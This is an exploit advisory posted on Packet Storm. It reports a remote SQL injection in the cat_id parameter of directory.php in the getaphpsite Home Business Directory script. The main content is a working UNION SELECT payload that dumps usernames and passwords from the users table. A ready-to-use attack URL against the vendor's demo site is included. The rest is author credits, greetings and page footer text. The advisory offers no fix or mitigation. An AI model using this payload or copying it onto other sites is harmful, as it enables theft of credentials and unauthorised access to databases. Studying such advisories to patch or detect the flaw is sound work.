getaphpsite Home Business Directory suffers from a remote SQL injection vulnerability in directory.php.
99cc22f5e46128f5455f8b19b2a3ca9d[~] getaphpsite Home Business Directory (cat_id) Remote Sql inj
[~]
[~] script: http://www.getaphpsite.com/17.html
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
[~]
[~] Date: 31.12.2008
[~]
[~] Home: www.z0rlu.blogspot.com / www.experl.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------
Exploit:
http://z0rlu.blogspot.com/script/directory.php?ax=list&sub=ZoRLu&cat_id=[SQL]
[SQL]=
0x3a+union+select+1,2,concat(username,0x3a,password),4+from+users
for demo:
http://www.getaphpsite.com/demos/homebiz/directory.php?ax=list&sub=ZoRLu&cat_id=0x3a+union+select+1,2,concat(username,0x3a,password),4+from+users
[~]----------------------------------------------------------------------
[~] Greetz tO: yildirimordulari.org & experl.com
[~]
[~]----------------------------------------------------------------------
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!